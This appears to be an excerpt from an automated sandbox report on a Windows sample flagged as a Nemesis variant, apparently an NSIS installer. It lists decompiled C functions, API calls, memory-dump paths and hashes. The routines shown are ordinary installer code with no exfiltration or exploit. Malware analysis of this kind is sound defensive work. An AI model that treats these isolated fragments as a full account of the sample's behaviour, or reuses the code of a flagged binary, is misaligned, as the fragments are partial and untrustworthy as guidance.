                                                  0x710811b1
                                                  0x00000000
                                                  0x710811b1
                                                  0x71081164
                                                  0x71081165
                                                  0x71081177
                                                  0x71081180
                                                  0x71081184
                                                  0x7108118e
                                                  0x71081191
                                                  0x71081193
                                                  0x71081193
                                                  0x00000000
                                                  0x71081165
                                                  0x71081143
                                                  0x71081218
                                                  0x7108121d
                                                  0x71081221
                                                  0x71081223
                                                  0x7108122c
                                                  0x7108122f
                                                  0x71081238
                                                  0x7108123d
                                                  0x7108123d
                                                  0x71081247
                                                  0x7108124a
                                                  0x00000000
                                                  0x71081250
                                                  0x71081149
                                                  0x7108114c
                                                  0x710811e9
                                                  0x710811ed
                                                  0x710811f7
                                                  0x710811fb
                                                  0x71081205
                                                  0x7108120a
                                                  0x71081211
                                                  0x00000000
                                                  0x71081211
                                                  0x71081152
                                                  0x71081155
                                                  0x00000000
                                                  0x00000000
                                                  0x7108115b
                                                  0x7108115e
                                                  0x710811b8
                                                  0x00000000
                                                  0x710811b8
                                                  0x71081160
                                                  0x71081162
                                                  0x7108119e
                                                  0x00000000
                                                  0x7108119e
                                                  0x00000000
                                                  0x710812a1
                                                  0x710812a1
                                                  0x710812ab
                                                  0x00000000

                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 71081171
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 710811E3
                                                  • GlobalFree.KERNEL32 ref: 7108124A
                                                  • GlobalFree.KERNEL32(?), ref: 7108129B
                                                  • GlobalFree.KERNEL32(00000000), ref: 710812B1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.970618355.0000000071081000.00000020.00000001.01000000.00000004.sdmp, Offset: 71080000, based on PE: true
                                                  • Associated: 00000000.00000002.970532047.0000000071080000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.970731155.0000000071084000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.970830151.0000000071086000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_71080000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: 3eb9351e5e9ee2a5fd4cd5e8a59bb0eac0a0a628c1a330e9efd28b256e7abc38
                                                  • Instruction ID: f5d831b36646ff750b90f83c0e8d2b047d235a4e9f004d385079a8f5d88a739b
                                                  • Opcode Fuzzy Hash: 3eb9351e5e9ee2a5fd4cd5e8a59bb0eac0a0a628c1a330e9efd28b256e7abc38
                                                  • Instruction Fuzzy Hash: 1051A0B690C202DFE701CF69C844A6A7BF9FF08B15B204569F946DB250E736E922CF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 92%
                                                  			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
                                                  				signed int _t14;
                                                  				int _t17;
                                                  				void* _t24;
                                                  				intOrPtr* _t29;
                                                  				void* _t31;
                                                  				signed int _t32;
                                                  				void* _t35;
                                                  				void* _t40;
                                                  				signed int _t42;
                                                  
                                                  				_t29 = __edi;
                                                  				_t24 = __ebx;
                                                  				_t14 =  *(_t35 - 0x28);
                                                  				_t40 = __edx - 0x38;
                                                  				 *(_t35 - 0x10) = _t14;
                                                  				_t27 = 0 | _t40 == 0x00000000;
                                                  				_t32 = _t40 == 0;
                                                  				if(_t14 == __ebx) {
                                                  					if(__edx != 0x38) {
                                                  						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
                                                  					} else {
                                                  						E00402DA6(0x21);
                                                  						E0040655F("C:\Users\Arthur\AppData\Local\Temp\nsy8A61.tmp", "C:\Users\Arthur\AppData\Local\Temp\nsy8A61.tmp\System.dll", 0x400);
                                                  						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsy8A61.tmp\System.dll");
                                                  					}
                                                  				} else {
                                                  					E00402D84(1);
                                                  					 *0x40adf0 = __ax;
                                                  					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
                                                  				}
                                                  				 *(_t35 + 8) = _t17;
                                                  				if( *_t29 == _t24) {
                                                  					L13:
                                                  					 *((intOrPtr*)(_t35 - 4)) = 1;
                                                  				} else {
                                                  					_t31 = E0040649D(_t27, _t29);
                                                  					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E0040610E(_t31, _t31) >= 0) {
                                                  						_t14 = E004060DF(_t31, "C:\Users\Arthur\AppData\Local\Temp\nsy8A61.tmp\System.dll",  *(_t35 + 8));
                                                  						_t42 = _t14;
                                                  						if(_t42 == 0) {
                                                  							goto L13;
                                                  						}
                                                  					} else {
                                                  						goto L13;
                                                  					}
                                                  				}
                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                                  				return 0;
                                                  			}












                                                  0x0040263e
                                                  0x0040263e
                                                  0x0040263e
                                                  0x00402643
                                                  0x00402646
                                                  0x00402649
                                                  0x0040264e
                                                  0x00402650
                                                  0x00402670
                                                  0x004026aa
                                                  0x00402672
                                                  0x00402674
                                                  0x00402688
                                                  0x00402695
                                                  0x00402695
                                                  0x00402652
                                                  0x00402654
                                                  0x00402659
                                                  0x00402667
                                                  0x0040266a
                                                  0x004026af
                                                  0x004026b2
                                                  0x0040292e
                                                  0x0040292e
                                                  0x004026b8
                                                  0x004026c1
                                                  0x004026c3
                                                  0x004026e2
                                                  0x004015b4
                                                  0x004015b6
                                                  0x00000000
                                                  0x004015bc
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004026c3
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll), ref: 00402695
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: lstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp$C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll
                                                  • API String ID: 1659193697-485457938
                                                  • Opcode ID: c6271de305d28e4340191c40b24bb758c2950df04ec3194b8553c0e0fd6979b8
                                                  • Instruction ID: edf8e5a6553ae7ef136857fb61bcac29e22bbc78049b19fa22ca3c34260198f3
                                                  • Opcode Fuzzy Hash: c6271de305d28e4340191c40b24bb758c2950df04ec3194b8553c0e0fd6979b8
                                                  • Instruction Fuzzy Hash: 2611EB71A00215BBCB10BFB18E4AAAE7665AF40744F25443FE002B71C2EAFC8891565E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00403019(intOrPtr _a4) {
                                                  				long _t2;
                                                  				struct HWND__* _t3;
                                                  				struct HWND__* _t6;
                                                  
                                                  				if(_a4 == 0) {
                                                  					__eflags =  *0x42aa20; // 0x0
                                                  					if(__eflags == 0) {
                                                  						_t2 = GetTickCount();
                                                  						__eflags = _t2 -  *0x434f0c;
                                                  						if(_t2 >  *0x434f0c) {
                                                  							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
                                                  							 *0x42aa20 = _t3;
                                                  							return ShowWindow(_t3, 5);
                                                  						}
                                                  						return _t2;
                                                  					} else {
                                                  						return E00406946(0);
                                                  					}
                                                  				} else {
                                                  					_t6 =  *0x42aa20; // 0x0
                                                  					if(_t6 != 0) {
                                                  						_t6 = DestroyWindow(_t6);
                                                  					}
                                                  					 *0x42aa20 = 0;
                                                  					return _t6;
                                                  				}
                                                  			}






                                                  0x00403020
                                                  0x0040303a
                                                  0x00403040
                                                  0x0040304a
                                                  0x00403050
                                                  0x00403056
                                                  0x00403067
                                                  0x00403070
                                                  0x00000000
                                                  0x00403075
                                                  0x0040307c
                                                  0x00403042
                                                  0x00403049
                                                  0x00403049
                                                  0x00403022
                                                  0x00403022
                                                  0x00403029
                                                  0x0040302c
                                                  0x0040302c
                                                  0x00403032
                                                  0x00403039
                                                  0x00403039

                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
                                                  • GetTickCount.KERNEL32 ref: 0040304A
                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                  • String ID:
                                                  • API String ID: 2102729457-0
                                                  • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                  • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                                                  • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                  • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 89%
                                                  			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                  				int _t15;
                                                  				long _t16;
                                                  
                                                  				_t15 = _a8;
                                                  				if(_t15 != 0x102) {
                                                  					if(_t15 != 0x200) {
                                                  						_t16 = _a16;
                                                  						L7:
                                                  						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
                                                  							_push(_t16);
                                                  							_push(6);
                                                  							 *0x42d254 = _t16;
                                                  							E00404ED4();
                                                  						}
                                                  						L11:
                                                  						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
                                                  					}
                                                  					if(IsWindowVisible(_a4) == 0) {
                                                  						L10:
                                                  						_t16 = _a16;
                                                  						goto L11;
                                                  					}
                                                  					_t16 = E00404E54(_a4, 1);
                                                  					_t15 = 0x419;
                                                  					goto L7;
                                                  				}
                                                  				if(_a12 != 0x20) {
                                                  					goto L10;
                                                  				}
                                                  				E004044E5(0x413);
                                                  				return 0;
                                                  			}





                                                  0x00405517
                                                  0x00405521
                                                  0x0040553d
                                                  0x0040555f
                                                  0x00405562
                                                  0x00405568
                                                  0x00405572
                                                  0x00405573
                                                  0x00405575
                                                  0x0040557b
                                                  0x0040557b
                                                  0x00405585
                                                  0x00000000
                                                  0x00405593
                                                  0x0040554a
                                                  0x00405582
                                                  0x00405582
                                                  0x00000000
                                                  0x00405582
                                                  0x00405556
                                                  0x00405558
                                                  0x00000000
                                                  0x00405558
                                                  0x00405527
                                                  0x00000000
                                                  0x00000000
                                                  0x0040552e
                                                  0x00000000

                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00405542
                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                                                    • Part of subcall function 004044E5: SendMessageW.USER32(001501A8,00000000,00000000,00000000), ref: 004044F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                  • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                                                  • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                  • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 90%
                                                  			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                  				int _v8;
                                                  				long _t21;
                                                  				long _t24;
                                                  				char* _t30;
                                                  
                                                  				asm("sbb eax, eax");
                                                  				_v8 = 0x800;
                                                  				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                  				_t30 = _a16;
                                                  				if(_t21 != 0) {
                                                  					L4:
                                                  					 *_t30 =  *_t30 & 0x00000000;
                                                  				} else {
                                                  					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                  					_t21 = RegCloseKey(_a20);
                                                  					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                  					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                  						goto L4;
                                                  					}
                                                  				}
                                                  				return _t21;
                                                  			}







                                                  0x00406419
                                                  0x0040641b
                                                  0x00406433
                                                  0x00406438
                                                  0x0040643d
                                                  0x0040647b
                                                  0x0040647b
                                                  0x0040643f
                                                  0x00406451
                                                  0x0040645c
                                                  0x00406462
                                                  0x0040646d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040646d
                                                  0x00406481

                                                  APIs
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,00406672,80000002), ref: 00406451
                                                  • RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll), ref: 0040645C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID: Call
                                                  • API String ID: 3356406503-1824292864
                                                  • Opcode ID: a598e195228f1036644e08b1753da052d1713cd74bd9ea8ab147b12b545f69e3
                                                  • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                                                  • Opcode Fuzzy Hash: a598e195228f1036644e08b1753da052d1713cd74bd9ea8ab147b12b545f69e3
                                                  • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00403B57() {
                                                  				void* _t2;
                                                  				void* _t3;
                                                  				void* _t6;
                                                  				void* _t8;
                                                  
                                                  				_t8 =  *0x42b22c;
                                                  				_t3 = E00403B3C(_t2, 0);
                                                  				if(_t8 != 0) {
                                                  					do {
                                                  						_t6 = _t8;
                                                  						_t8 =  *_t8;
                                                  						FreeLibrary( *(_t6 + 8));
                                                  						_t3 = GlobalFree(_t6);
                                                  					} while (_t8 != 0);
                                                  				}
                                                  				 *0x42b22c =  *0x42b22c & 0x00000000;
                                                  				return _t3;
                                                  			}







                                                  0x00403b58
                                                  0x00403b60
                                                  0x00403b67
                                                  0x00403b6a
                                                  0x00403b6a
                                                  0x00403b6c
                                                  0x00403b71
                                                  0x00403b78
                                                  0x00403b7e
                                                  0x00403b82
                                                  0x00403b83
                                                  0x00403b8b

                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,75533420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                                                  • GlobalFree.KERNEL32(?), ref: 00403B78
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: Free$GlobalLibrary
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 1100898210-3355392842
                                                  • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                  • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                                                  • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                  • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 77%
                                                  			E00405E58(WCHAR* _a4) {
                                                  				WCHAR* _t5;
                                                  				WCHAR* _t7;
                                                  
                                                  				_t7 = _a4;
                                                  				_t5 =  &(_t7[lstrlenW(_t7)]);
                                                  				while( *_t5 != 0x5c) {
                                                  					_push(_t5);
                                                  					_push(_t7);
                                                  					_t5 = CharPrevW();
                                                  					if(_t5 > _t7) {
                                                  						continue;
                                                  					}
                                                  					break;
                                                  				}
                                                  				 *_t5 =  *_t5 & 0x00000000;
                                                  				return  &(_t5[1]);
                                                  			}





                                                  0x00405e59
                                                  0x00405e63
                                                  0x00405e66
                                                  0x00405e6c
                                                  0x00405e6d
                                                  0x00405e6e
                                                  0x00405e76
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405e76
                                                  0x00405e78
                                                  0x00405e80

                                                  APIs
                                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00405E5E
                                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe,80000000,00000003), ref: 00405E6E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-3370423016
                                                  • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                  • Instruction ID: d2786f61c86b799b8b6ecf14661ff9643eaf9d362a95097130d0805b1e4d2bc4
                                                  • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                  • Instruction Fuzzy Hash: 36D0A7B3410D20DAC3126718DC04DAF73ECFF6134074A442AF481A71A4D7785E8186ED
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                  				int _v8;
                                                  				int _t12;
                                                  				int _t14;
                                                  				int _t15;
                                                  				CHAR* _t17;
                                                  				CHAR* _t27;
                                                  
                                                  				_t12 = lstrlenA(_a8);
                                                  				_t27 = _a4;
                                                  				_v8 = _t12;
                                                  				while(lstrlenA(_t27) >= _v8) {
                                                  					_t14 = _v8;
                                                  					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                  					_t15 = lstrcmpiA(_t27, _a8);
                                                  					_t27[_v8] =  *(_t14 + _t27);
                                                  					if(_t15 == 0) {
                                                  						_t17 = _t27;
                                                  					} else {
                                                  						_t27 = CharNextA(_t27);
                                                  						continue;
                                                  					}
                                                  					L5:
                                                  					return _t17;
                                                  				}
                                                  				_t17 = 0;
                                                  				goto L5;
                                                  			}









                                                  0x00405fa2
                                                  0x00405fa4
                                                  0x00405fa7
                                                  0x00405fd3
                                                  0x00405fac
                                                  0x00405fb5
                                                  0x00405fba
                                                  0x00405fc5
                                                  0x00405fc8
                                                  0x00405fe4
                                                  0x00405fca
                                                  0x00405fd1
                                                  0x00000000
                                                  0x00405fd1
                                                  0x00405fdd
                                                  0x00405fe1
                                                  0x00405fe1
                                                  0x00405fdb
                                                  0x00000000

                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBA
                                                  • CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                  • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                                                  • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                  • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:20.5%
                                                  Dynamic/Decrypted Code Coverage:99.2%
                                                  Signature Coverage:0.6%
                                                  Total number of Nodes:492
                                                  Total number of Limit Nodes:24
